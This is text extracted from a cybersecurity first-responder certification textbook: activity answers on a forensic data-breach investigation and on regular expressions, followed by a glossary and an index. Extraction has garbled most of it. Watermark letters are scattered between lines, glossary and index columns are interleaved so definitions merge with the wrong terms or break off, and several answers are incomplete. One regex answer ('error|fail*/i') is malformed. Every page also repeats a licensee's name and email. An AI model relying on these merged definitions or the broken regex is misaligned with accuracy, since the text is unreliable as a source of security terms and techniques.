affected, every employee involved, and so on. This will ensure that the forensic team does not have an
incomplete picture from which to draw evidence. It's also important that the CSIRT describe the
techniques and tools they used to contain and mitigate the incident, as these could end up affecting the
investigation.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
504 | CyberSec First Responder® (Exam CFR-410)
e
ACTIVITY 11-1: Applying a Forensic Investigation Plan
ut
What must you know about Develetech's computing environments
ib
1.
to prepare for a forensic investigation?
tr
A: Answers will vary. You need to know the following about the systems affected by the
incident: the type of hardware in place; the operating systems and other software used on
the computers; any environments that may have been virtualized versus those that are
is
physical; the forensic tools of the trade that can assist you in your duties; any of
Develetech's systems that must stay active during an investigation to support business
needs; and all applicable laws and regulations that could impact your work.
D
2. How can an analysis of these anti-malware logs help your
investigation?
or
A: Answers may vary, but the team might be able to discover identifying information from
the titles of the other files on the USB drive. This could lead them to the culprit or at least
the owner of the USB drive.
e
What are some of the important steps involved in upholding the
at
3.
integrity of your investigation? How can you better convince your
audience of your findings?
lic
A: Answers may vary, but observing the chain of custody is a must for any investigation.
The movement of Pat's workstation and the research and development server should be
documented based on who last worked with each computer and what exactly was done.
up
This process should be ongoing. Furthermore, you need to consider how the evidence
you found so far can be authenticated. You need to demonstrate to your supervisor, and
possibly to law enforcement in the future, that the evidence you gathered has not been
tampered with. One example is by hashing the images of each drive so that an outside
D
party can verify that hash when the evidence makes its way into their custody.
ot
A: A hash value supports integrity of evidence; when the drive image moves down the
chain of custody, the actual hash can be compared to the expected value. If they match,
the forensic analyst or court official can confirm that the evidence was not tampered with
during this time.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 505
3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and come
to understand the bigger picture of an incident.
4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
e
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea to
replicate this image across more than one physical medium in case one were to fail. The rooms in which
ut
you store these physical media should be locked and climate controlled.
ib
ACTIVITY 11-3: Analyzing Forensic Evidence
tr
6. Focusing on just the non-deleted files, what does this tell you about Rupert's
is
interests? Is there anything incriminating so far?
D
A: Rupert seems to be interested in video games, as the drive includes various files related to them.
That's obviously not incriminating by itself, but it may suggest that he was wasting company time and
resources if he was using this drive at work. More interestingly, the drive includes the
my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's breached
10.Just by looking at the list of names, what can you tell about what was deleted
lic
various names, some of which appear incomplete. It may be possible to guess the contents of some of
the files based on their names and file extensions. For example, dt-w1_product_specs.pdf is likely the
product specification document for Develetech's smartwatch.
D
12.How will using this tool help you in your case against Rupert?
A: It enables a detailed analysis of information from drive images and gives an investigator the ability to
write notes about content and examine evidence without risking contamination of the original evidence.
ot
13.Considering all of your work so far, how confident are you of Rupert's
N
to a final judgment, and will want to see if there is any more evidence that could make them more
certain.
D
14.Given the nature of the evidence you've analyzed, what would you suggest
Rupert's intentions were?
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending to
sabotage Develetech, either by giving away its secrets or by selling those secrets to a competitor.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
506 | CyberSec First Responder® (Exam CFR-410)
1. Based on your findings of the data breach incident, what would you
include in this report?
A: Answers will vary. A useful report includes the following information: who authorized
the investigation, the focus of the investigation, the specific people and systems you
investigated, what you found, and how it all comes together. For the data breach incident,
e
you may choose to begin the report by stating that you were authorized to perform the
investigation by the CISO of Develetech, and that you were tasked with finding out what
ut
data was breached and who was responsible. The assets that the team investigated
were: Pat's workstation, the system and anti-malware logs on that workstation, the
research and development server, the system and network logs of that server, the
ib
network logs of various other devices, the people who were indirectly affected by the
incident (Charles and the help desk employee), one of the victims (Pat), and the primary
suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence
tr
of a remote connection from inside the network using certain credentials (Pat's), network
logs supporting these connection attempts, host and anti-malware logs indicating that
is
sensitive files were transferred off the research and development server, the USB drive
with those files on them, and more. You could then likely end with a way to pull it all
together, constructing a single narrative of events as implied by the evidence you found.
D
This narrative should go step-by-step and explain how Rupert breached the server, why
he did so, and what he might have done with this stolen data.
2.
this initiative? or
If Develetech decides to press charges, what can you do to help
A: Answers may vary, but a forensic investigator should research the laws that govern the
e
organization, including specifically which laws may have been broken as a result of the
data breach. If legal counsel advises the company to press charges, you can further tailor
at
your report to speak to the applicable laws. For example, some laws will place greater
value on certain types of evidence, so you'll want to make sure the report focuses on that
evidence so that it clearly illustrates how the law was broken.
lic
A: Answers will vary. It's important that the liaison clearly understands what law
enforcement officials expect of them, and likewise, communicates what they expect of the
officials. This will enable you to exchange information and evidence without issue. Also,
D
you shouldn't expect that local law enforcement will provide a comprehensive level of
assistance to your investigation; you may need to do most of the remaining work
internally. Still, some agencies (particularly federal ones) may have tools at their disposal
that you do not. You should take advantage of these tools wherever possible.
ot
N
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 507
2. How would you write a regular expression to capture all of these extended
ZIP codes?
A: The expression \d{5}-\d{4} does the job.
3. In the ZIP code example, what if you wanted to capture all possible five-digit
ZIP codes or any extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like \d{5}-
\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to indicate
e
an alternative.
ut
4. In the following space, write a regular expression that searches for these
messages, regardless of capitalization.
ib
A: A basic example is error|fail*/i
What do all email addresses share in common? What, if anything, can remain
tr
5.
static in this expression? What characters will you need to escape? Does the
is
expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific character
D
requirements may vary; for example, top-level domains are generally not longer than four characters,
the entire address is usually not allowed to be over 255 characters, and some systems do not allow
certain special characters. Still, the @ symbol and the period are always going to be in an email
or
address. Beyond this, nothing is really static, as you're trying to search for all possible addresses. The
only real character you need to escape is the period before the top-level domain. The expression
doesn't need to be perfect, and you may not even need to pay attention to character limits in the local
name and domain sections.
e
6. In the following space, write out your regular expression to capture everything
at
8. When would you use regular expressions rather than normal searches in
logs?
ot
A: Answers will vary, but may include searching for any string that you know only part of; version
numbers; timestamps; IP addresses; port numbers; user names; and more.
N
o
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
ib
AAR APT
(after-action report) A document that (advanced persistent threat) An attack that
tr
includes an analysis of security events and remains covert over a long period of time.
incidents that can provide insight into how
is
to enhance security for the future. armored virus
A virus that obscures its true location in a
D
account management system by misleading the anti-malware
A common term used to refer to the system into thinking it resides elsewhere.
processes, functions, and policies used to
organization. or
effectively manage user accounts within an ARO
(annual rate of occurrence) How many
times per year a particular loss is expected
administrative controls
e
to occur.
Security measures implemented to monitor
at
e
used to achieve that goal, and possibly any (business continuity plan) A plan that
ut
mitigation techniques the security details exactly how an organization ought
professional can employ to prevent or stop to continue day-to-day operations in the
the attack. event of a disaster that causes at least one
ib
critical operation to fail.
attack vector
tr
The method or path that an attack takes. beaconing
The process by which a bot in a botnet
is
auditing sends its status (a "heartbeat") to a
A detailed and specific evaluation of a command and control server to indicate
D
process, procedure, organization, job that it is "alive."
function, or system, in which results are
gathered and reported to ensure that the behavioral analysis
legal responsibilities.
or
target of the audit is in compliance with
the organization's policies, regulations, and
The process of identifying the way in
which an entity acts, and then reviewing
future behavior to see if it deviates from
the norm.
e
authorization
at
attacker leaves infected physical media in A pen testing approach that simulates an
an area where a victim finds it and then outside attacker that knows little to
D
inserts it into a computer. nothing about the target. The pen tester
must do their own reconnaissance.
Bash
A command shell and scripting language black hole
for Unix-like systems. A component of network architecture that
drops any packets it receives, without
alerting the source.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 511
blacklisting CBEST
The process of blocking specific systems, A penetration testing framework created by
software, services, and more, from using a CREST that is geared toward the UK financial
resource. Anything not on the list is allowed. sector.
Bluetooth CDM
A wireless technology that facilitates short- (Continuous Diagnostics and Mitigation) A
range wireless voice and data communications program created by the Department of
between devices. Homeland Security to identify threats,
e
prioritize those threats in terms of the risks
ut
bot they pose, and then give security personnel the
A machine that has been infected as part of a ability to triage these threats, all on an ongoing
botnet. basis.
ib
botnet CESG
tr
A set of computers that has been infected by a (Communications–Electronics Security Group)
control program that enables attackers to An organization within the UK government
is
collectively exploit those computers to mount that assists other government entities with their
attacks. information security.
D
BPA CFAA
(business partnership agreement) Defines how (Computer Fraud and Abuse Act) A U.S. law
a partnership between business entities will be
conducted, and what exactly is expected of
each entity in terms of services, finances, and
security.
or
that prohibits users from accessing computer
systems without authorization.
chain of custody
e
The record of evidence handling from
at
CHECK
CAM table A framework established by the UK security
(content-addressable memory) A table used by group CESG to ensure that government
ot
switches to map MAC addresses to ports to agencies can identify vulnerabilities to their
forward packets to specific interfaces. confidentiality, integrity, and availability
N
Pornography and Marketing) A U.S federal law (confidentiality, integrity, availability) The three
that outlines various rules for the sending of principles of security control and management.
D
CAPEC cipher
(Common Attack Pattern Enumeration and An algorithm used to encrypt or decrypt data.
Classification) A database that classifies Algorithms can be simple mechanical
specific attack patterns. Maintained by the substitutions, but in electronic cryptography,
MITRE Corporation.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
512 | CyberSec First Responder® (Exam CFR-410)
e
A list of various cybersecurity control confidentiality
ut
categories and action items compiled by the The fundamental security goal of keeping
Center for Internet Security (CIS). information and communications private and
protecting them from unauthorized access.
ib
clickjacking
An attack in which an attacker tricks a client configuration management
tr
into clicking a web page link that is different The process through which an organization's
from where they had intended to go. information systems components are kept in a
is
controlled state that meets the organization's
closed source intelligence requirements, including those for security and
Information that is obtained through private
D
compliance.
sources.
continuous monitoring and
CMMC
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 513
e
cryptography domains.
ut
The science of altering data to make it
unintelligible to unauthorized parties. cyberterrorist
An attacker who uses computers to damage
ib
CSA other computer systems and generally spread
(Cloud Security Alliance) A coalition of several alarm.
tr
member organizations that seek to promote
best practices for the security of cloud data analytics
is
computing. The process of applying analytical techniques
to data in order to reveal patterns that can
CSIRT
D
inform decision making.
(cybersecurity incident response team) A
collection of individuals who are trained in the data exfiltration
proper collection and preservation techniques
for investigating security incidents.
CSM
to another.or
The malicious transfer of data from one system
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
514 | CyberSec First Responder® (Exam CFR-410)
e
eliminating the drive's magnetic charge. implementation of JavaScript to execute their
ut
attack solely on the client.
DES
(Data Encryption Standard) A block cipher DoS attack
ib
symmetric encryption algorithm that encrypts (denial of service attack) A type of attack in
data in 64-bit blocks using a 56-bit key with 8 which an attacker attempts to disrupt or
tr
bits used for parity. disable systems that provide network or
application services by various means.
is
DHCP spoofing
(Dynamic Host Configuration Protocol) An doxing
D
attack in which an attacker responds to a client The practice of publishing an individual's
requesting address assignment from a DHCP personally identifiable information online.
server.
digital signature or
A message digest that has been encrypted again
with a user's private key.
drone
See bot.
DRP
e
(disaster recovery plan) A policy that defines
at
authorized to access.
dumpster diving
disassembler A human-based attack where the goal is to
up
EDR
DNS amplification attack (endpoint detection and response) A system
(Domain Name System) A type of reflected that uses various techniques to monitor and
ot
attack in which a small query to a DNS server analyze data collected from network hosts, and
returns a reply up to eight times larger and responds to protect those hosts from threats.
N
can access based on pre-configured blacklists potential targets for further attack.
or whitelists.
ETL
DNS hijacking (extract, transform, load) The process of
An attack in which an attacker modifies a combining data from multiple sources,
computer's DNS configurations to point to a preparing the data, and loading the resulting
malicious DNS server. data into a destination format.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 515
e
file inclusion certain account behavior is possible given the
ut
An attack in which an attacker adds a file to the speed of current travel technology.
running process of a web app or website.
GHDB
ib
fingerprinting (Google Hacking Database) A collection of
The technique of determining the type of web-based exploits that can be launched
tr
operating system and services a target uses by through the Google search engine.
studying the types of packets and the
is
characteristics of these packets during a GLBA
communications session. (Gramm–Leach–Bliley Act) A U.S. federal law
D
enacted in 1999 that deregulated banks, but
firewall also instituted requirements that help protect
Any software or hardware device that protects the privacy of an individual's financial
a system or network by blocking unwanted
network traffic.
FISMA
or
information that is held by financial
institutions.
golden ticket
e
(Federal Information Security Management A Kerberos authentication ticket that can grant
at
Act) A U.S. law enacted in 2002 and amended other tickets in an Active Directory
in 2014 that includes several provisions that environment.
require federal organizations to more clearly
lic
GAPP hashing
D
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
516 | CyberSec First Responder® (Exam CFR-410)
e
establish several rules and regulations regarding A human-based attack where an attacker
ut
healthcare in the United States. pretends to be someone they are not.
ib
An email-based or web-based attack that tricks The process by which an organization reacts to
the user into performing undesired actions, and reports security breaches within an
tr
such as deleting important system files in an acceptable time period.
attempt to remove a virus, or sending money
is
or important information via email or online inherent risk
forms. Risk that an event will pose if no controls are
put in place to mitigate it.
D
honeypot
The practice of tricking an attacker into input validation
or
accessing an isolated network or system so that
the attacker may be monitored and eventually
dealt with.
Any technique used to ensure that the data
entered into a field or variable in an application
is handled appropriately by that application.
e
horizontal privilege escalation integrity
at
When a user accesses or modifies specific The fundamental security goal of ensuring that
resources that they are not entitled to. electronic data is not altered or tampered with.
lic
IA interference
(interoperability agreement) General term for Radio waves disrupting wireless signals.
any document that outlines a business
up
IOC
partnership or collaboration in which all
(indicator of compromise) A sign that an asset
entities exchange some resources while
or network has been attacked or is currently
working together.
D
under attack.
IAM
IPS
(identity and access management) The
ot
ICMP flood
(Internet Relay Chat) A group communications
(Internet Control Message Protocol) An attack
D
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 517
e
An organization that promotes information
ut
technology and cybersecurity through least privilege
frameworks like COBIT and certification The principle that states that users and
programs like Certified Information Security software should only have the minimal level of
ib
Manager (CISM). access that is necessary for them to perform
the duties required of them.
tr
ISF
(Information Security Forum) An independent, levels of authority
is
not-for-profit organization that looks at key A hierarchy that dictates what actions an
issues in security and risk management, and individual can take, and what responsibilities
D
develops best practices that meet the needs of they have.
its members.
LFI
ISO
(International Organization for
Standardization) An organization with global
reach that promotes standards for many
or
(local file inclusion) An attack in which an
attacker executes a script to run a file already
existing on a web server.
e
different industries. live VM migration
at
A framework that outlines various concerns (lessons learned report) See AAR.
and solutions regarding data privacy.
log auditing
D
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
518 | CyberSec First Responder® (Exam CFR-410)
e
without being given explicit instructions. MOU
ut
(memorandum of understanding ) An informal
malvertisement business agreement that is usually not legally
Malicious code delivered through online binding and typically does not involve the
ib
advertisements. exchange of money.
tr
malware MSA
Malicious software. (master service agreement) A document that
is
lays the groundwork for any future business
man-in-the-middle attack documents that two parties may agree to.
A form of eavesdropping where the attacker
D
makes an independent connection between NAC
two victims and accesses or disrupts sensitive (network access control) The collected
information.
management controls
See administrative controls.
or protocols, policies, and hardware that govern
access on device network interconnections.
NBAD
e
(network behavior anomaly detection) A
mandatory vacation
at
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 519
e
environments. preserved after an incident before the data
ut
deteriorates, is erased, or is overwritten.
NIST Privacy Framework
A framework that provides guidance to OSSTMM
ib
organizations for managing risks to data (Open Source Security Testing Methodology
privacy. Manual) A manual developed by the Institute
tr
for Security and Open Methodologies
NIST SP 800-61 (ISECOM) that outlines every area of an
is
(NIST Special Publication 800-61) A set of organization that needs testing, as well as goes
guidance and recommendations during the into details about how to conduct the relevant
D
incident response process. tests.
non-repudiation OVAL
The security goal of ensuring that the party
that sent a transmission or created data
remains associated with that data and cannot
deny sending or creating that data.
or
(Open Vulnerability and Assessment
Language) An open standard that promotes
communication about cybersecurity
information. Maintained by the MITRE
e
Corporation.
at
normalization
In the context of network security intelligence OWASP
collection, the process of converting security- (Open Web Application Security Project) A
lic
related data from network logs, system logs, community effort that provides free access to a
application APIs, and other sources into number of secure programming resources and
common formats that can easily be analyzed. best practices.
up
an attacker sends a small query to an NTP (instead of modifying existing network traffic)
server, which then returns a much larger to test the behavior of network devices,
response that includes data from the last 600 enabling a hacker to enumerate firewall or
ot
machines the server has communicated with. intrusion detection rules that are in place.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
520 | CyberSec First Responder® (Exam CFR-410)
e
stored or transmitted by a computer. ping flood
ut
See ICMP flood.
password sniffing
The practice of monitoring for password data PIPEDA
ib
in network transmissions. (Personal Information Protection and
Electronic Documents Act) A Canadian act,
tr
patch management applying to all organizations, that regulates the
The process of collecting, evaluating, testing, collection, use, and disclosure of personal
is
and deploying fixes to computer software. information and brings Canada into
compliance with European Union privacy
PCI DSS
D
regulations.
(Payment Card Industry Data Security
Standard) A proprietary standard that specifies pivoting
An attack in which a request for a website, traffic from this port to a host's port on a
typically an e-commerce site, is redirected to a different subnet using pivoting methods.
similar-looking, but fake, website.
ot
port scanner
phishing A device or application that scans a network to
A type of social engineering attack in which the
N
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 521
e
normally not allowed access to. A cross-site scripting (XSS) attack in which an
ut
attacker crafts a malicious form or other
program packer request to be sent to a legitimate web server.
A partly compressed executable that also The victim selects the malicious request and
ib
includes decompression code that will the script is sent to the server and reflected off
decompress the program before executing it. it onto the victim's browser.
tr
PsExec reflected DoS attack
is
A Windows-based remote access service that An attack in which a forged source IP address
doesn't require setup on the host being (the target) is used when sending requests to a
accessed remotely.
D
large number of computers. This causes those
systems to send a reply to the target system,
PTES
causing a DoS condition.
(Penetration Testing Execution Standard) A
standard established in 2009 that covers seven
areas of penetration testing and includes an
accompanying technical guide.
or
regular expression
A group of characters that describe how to
execute a specific search pattern on a given
e
text.
public key
at
A risk analysis method that uses descriptions A type of DoS vulnerability that occurs when
and words to measure the likelihood and an application does not properly restrict access
impact of risk. to requested or needed resources.
D
rainbow table
An offline password attack technique that uses RFI
sets of pre-computed passwords and their (remote file inclusion) An attack in which an
hashes stored in a file that dramatically reduce attacker executes a script to include an external
the time needed to crack a password. file in a running web app or website.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
522 | CyberSec First Responder® (Exam CFR-410)
e
risk avoidance Malicious code that is intended to take full or
ut
The response of eliminating the source of a partial control of a system at the lowest levels.
risk so that the risk is removed entirely.
salting
ib
risk exposure The act of adding a random value to the
The property that dictates how susceptible an plaintext input in a hashing operation to
tr
organization is to loss. defend against rainbow table attacks.
is
risk management sandboxing
The cyclical process of identifying, assessing, The practice of isolating an environment from
analyzing, and responding to risks. a larger system to guarantee that the
D
environment runs in a controlled, secure
risk mitigation fashion.
risk transference
or
The response of reducing risk to fit within an
sanitization
The process of thoroughly and completely
removing data from a storage medium so that
e
The response of moving the responsibility of the data cannot be recovered.
at
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 523
SDLC sinkhole
(systems development lifecycle) The practice of A network defense method of redirecting
designing and deploying technology systems outbound malicious traffic to an internal host
from initial planning all the way to end-of-life. so that it cannot escape outside the network.
e
network.
ut
site book
security intelligence A document or collection of documents that
The process through which data generated in take stock and inventory of all known assets,
ib
the ongoing use of information systems is configurations, protocols, and processes that
collected, processed, integrated, evaluated, make up a particular site.
tr
analyzed, and interpreted.
SLA
is
semi-quantitative analysis (service-level agreement) A business agreement
A risk analysis method that blends qualitative that outlines what services and support will be
D
and quantitative analysis methods together. provided to a client.
active session to obtain unauthorized access to messages to trick a victim into revealing
data, services, and networks. information.
D
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
524 | CyberSec First Responder® (Exam CFR-410)
e
organization's financial and business published by the American Institute of
ut
operations. Certified Public Accountants (AICPA) that
focuses on financial reporting.
spam
ib
An email-based threat that floods the user's SSH
inbox with emails that typically carry (Secure Shell) A protocol for secure remote
tr
unsolicited advertising material for products or logon and secure transfer of data.
other spurious content, and which sometimes
is
deliver malware. It can also be used with social SSL/TLS
networking sites such as Facebook and (Secure Sockets Layer/Transport Layer
D
Twitter. Security) A security protocol that uses
certificates and public key cryptography for
SPAN mutual authentication and data encryption over
(switch port analyzer) An approach to
or
capturing network data in which a network
appliance copies incoming and outgoing traffic
to a separate port on the appliance, which is
a TCP/IP connection.
SSO
(single sign-on) An authentication mechanism
e
then forwarded to another device for analysis. that provides users with one-time
at
A spam attack that is propagated through on helping businesses understand and address
instant messaging rather than email. evolving security issues in the subject areas of
compliance, threats, and risk management.
D
spoofing
A software-based attack where the goal is to steganography
assume the identity of a user, process, address, A security technique that hides a secret
ot
Surreptitiously installed malicious software that A cross-site scripting (XSS) attack in which an
is intended to track and report the usage of a attacker injects malicious code or links into a
o
target system or collect other data the author website's forums, databases, or other data.
wishes to obtain.
D
STRIDE
SQL (spoofing, tampering, repudiation, information
(Structured Query Language) A language that disclosure, denial of service, and elevation of
applications use to interact with a database to privilege) An acronym used to classify threats.
perform four basic functions: selecting,
inserting, deleting, and updating data in the
database.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 525
e
Services.
ut
tabletop exercise
A discussion of simulated emergency situations traffic analysis
and security incidents. See packet trace analysis.
ib
tailgating transport encryption
tr
A human-based attack where the attacker slips The technique of encrypting data that is in
in through a secure area following an unaware transit, usually over a network like the Internet.
is
legitimate employee.
trend analysis
TAP The process of detecting patterns within a
D
(test access point) A device that captures dataset over time, and using those patterns to
network data that flows between network make predictions about future events or to
appliances, then forwards that data along
separate ports to another device for analysis.
TCPED
or
better understand past events.
Trojan horse
A type of malware that hides itself on an
e
(tasking, collection, processing, exploitation, infected system and can cause damage to a
at
and dissemination) The five primary phases of system or give an attacker a platform for
the threat intelligence lifecycle. monitoring and/or controlling a system.
lic
The process of addressing information about (User Datagram Protocol) An attack in which
D
emerging threats and threat sources. an attacker attempts to overwhelm the target
system with UDP ping requests.
threat modeling
The process of identifying and assessing the update management
possible attack vectors that target systems. See patch management.
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
526 | CyberSec First Responder® (Exam CFR-410)
e
threats to cybersecurity. (web application firewall) A type of firewall
ut
that controls web-based application-layer
vertical privilege escalation traffic in the network.
An attack in which an attacker can perform
ib
functions that are normally assigned to users in war driving
higher roles, and often explicitly denied to the The act of searching for a wireless network
tr
attacker. signal while in a moving vehicle.
is
virtualization web service
The process of creating a simulation of a Any software that provides network
D
computing environment, where the virtualized communication between devices.
system can simulate the hardware, operating
system, and applications of a typical computer whaling
virus
or
without being a separate physical computer.
white box
e
one computer to another by attaching itself to A pen test approach that simulates an inside
at
other files through a process of replication. attacker that knows everything about the
target. The pen tester does not need to
vishing perform their own reconnaissance, as this is
lic
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 527
WPS
(Wi-Fi Protected Setup) An insecure feature of
WPA and WPA2 that enables enrollment in a
wireless network based on an 8-digit PIN.
WSDL
(Web Services Description Language) An
XML-based protocol for transmitting and
receiving information used in web applications
e
to a variety of device types.
ut
XSRF
(cross-site request forgery) A web application
ib
attack where an attacker takes advantage of the
trust established between an authorized user of
tr
a website and the website itself.
is
XSS
(cross-site scripting) A web application attack
D
where the attacker takes advantage of scripting
and input validation vulnerabilities in an
interactive website to attack legitimate users.
Z shell
An updated version of the Bash shell that has
various improvements to the shell but the
or
e
same basic syntax as Bash.
at
zombie
See bot.
lic
up
D
ot
N
o
D
Glossary
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
ib
tr
A targets 131
technique criteria 61
is
AAR
trees 81
important questions 403
vectors 61
overview 402
D
attack surface
account management 43
defined 122
Active Directory analysis tools 351
mapping 261
active fingerprinting 242
administrative controls 26
or
Address Resolution Protocol, See ARP
authorization 112
annual loss expectancy, See ALE
availability 18
annual rate of occurrence, See ARO
anomaly analysis 282
B
D
anti-forensics 209
application logs 304 backdoors 188
APTs
ot
baiting 110
overview 187 base metrics 27
armored viruses 144 Bash 322
N
e
business continuity plan, See BCP Common Weakness Enumeration, See
business impact analysis, See BIA CWE
ut
business partnership agreement, See BPA communication
BYOD within CSIRT 397
ib
threats 169 with third parties 436
trends in mobile security 168 Communications-Electronics Security
Group, See CESG
tr
C compensating control 44
compromised system analysis 445
is
C&C 180, 182 Computer Fraud and Abuse Act, See
CAM CFAA
D
overview 287 Computer Misuse Act 13
tables 287 confidentiality 18
CAN-SPAM 15 confidentiality, integrity, and availability,
CAPEC 29
CBEST 254
CDM 274
or See CIA
confidentiality, integrity, and availability
triad, See CIA triad
e
Center for Internet Security, See CIS configuration files 286
CESG 254
at
COPPA 15
client-side attacks 131 correlation analysis 282
closed source intelligence 86 Council for Registered Ethical Security
o
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 531
e
cut command 318 as target 88
CVE 28 event logs 305
ut
CVSS 27 filtering 413
CWE 29 hijacking attack 154
ib
cyber attack anatomy 78 poisoning attack 153
cybercriminals 55 documentation
Cyber Kill Chain 78, 79 incident response 392
tr
cyberlaw 460 investigation results 461
cybersecurity security-related 45
is
defined 2 within CSIRT 397
elements 2 Document Object Model attacks, See DOM-
D
incident response team, See CSIRT based attacks
standards and frameworks 10 Domain Name System, See DNS
threat motives 56 DOM-based attacks 131
Cybersecurity Model Maturity Certification, See
CMMC
cyberterrorism 56
DoS
or
attack 161
attack techniques 161
e
cyberterrorists 56 evasion techniques 163
at
tools 164
D doxing 59
drive usage
lic
preservation 444
remanence 174
remnants 174 E
ot
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
532 | CyberSec First Responder® (Exam CFR-410)
for reconnaissance 90 G
Event Viewer 321
GAPP 14
evidence authentication 435
GDPR 16
evil twin 380
General Data Protection Regulation, See
excessive bandwidth usage 378
GDPR
exploits
Generally Accepted Privacy Principles, See
current landscape 69
GAPP
web services 136
geo-velocity 381
e
expressions
GHDB 261
building 475
ut
GLBA 15
regular 472
golden tickets 193, 209
extract, transform, and load, See ETL
Google Hacking Database, See GHDB
ib
Gramm–Leach–Bliley Act, See GLBA
F grep command 317
tr
Federal Information Security Management Act, grey box test 256
See FISMA
is
file H
carving 444
hacktivists 55
D
inclusion 134
hashing 26
inclusion, local 135
Health Insurance Portability and
inclusion, remote 134
sharing services 203
systems 443
file system analysis tools 345, 362
or Accountability Act, See HIPAA
heuristic analysis 282
hijacking
cookie 135
e
find command 320
DNS 114, 154
findstr command 320
at
firewalls
HIPAA 15, 17
as security controls 25
hoax 109
logs 288
honeypot 411
up
mitigation 416
horizontal privilege escalation 125
FISMA 13
HTTP/S 181
flash crowds 293
HTTP logs 307
D
footprinting
methods 86
overview 86 I
ot
forensic analysts IA 46
CSIRT communication 425 IAM
day in the life 430
N
overview 407
duties 425 ICMP
forensics as C&C channel 182
o
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 533
e
impact 399 law enforcement liaisons 461
indicator sources 398 least privilege 41
ut
internal and external communication 397 lessons learned report, See LLR
mitigation 417 levels of authority 31
ib
mitigation and eradication 401 LFI 135
post-incident phase 402 LLR 402
recovery 401
tr
local file inclusion, See LFI
response 41, 393 log analysis tools 316, 324
scope 399
is
logical controls 25
indicators of compromise, See IOCs logic bomb
information processing techniques 189
D
overview 277 logs
Information Security Forum, See ISF application 304
Information Technology Assurance
Framework, See ITAF
inherent risk 31
input validation 131
or
auditing 278
cloud provider 292
DNS 305
enrichment 277
e
integrity 18 Event Viewer 321
at
compliance 17
ISO/IEC 27000 series 11, 14
M
D
Index
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
534 | CyberSec First Responder® (Exam CFR-410)
mandatory vacation 41 O
man-in-the-middle attack 154
OLA 46
masked attacks 125
open source intelligence 86
master service agreement, See MSA
Open Source Security Testing Methodology
MDM 408
Manual, See OSSTMM
memorandum of understanding, See MOU
Open Vulnerability and Assessment Language,
memory analysis tools 350, 365
See OVAL
memory leaks 244
Open Web Application Security Project, See
e
memory residents 210
OWASP
message digest 26
ut
operating-level agreement, See OLA
metric groups 27
operating system logs 302
MITRE Corporation 28
operational controls 26
ib
mobile
order of volatility 443
infrastructure hacking tools 170
OSSTMM 254
security trends 168
tr
OVAL 279
mobile device management, See MDM
OWASP 12, 254
mobile platform
is
threats 169
modifiers 475 P
D
MOU 46 packet
MSA 45 crafting 262
N
NAC 418
or generators 162
manipulation 261
trace analysis 91
parameterized queries 134
e
National Institute of Standards and
passive fingerprinting 242
Technology, See NIST
at
NDA 46
cracking 124
NERC 1300 12
sniffing 123
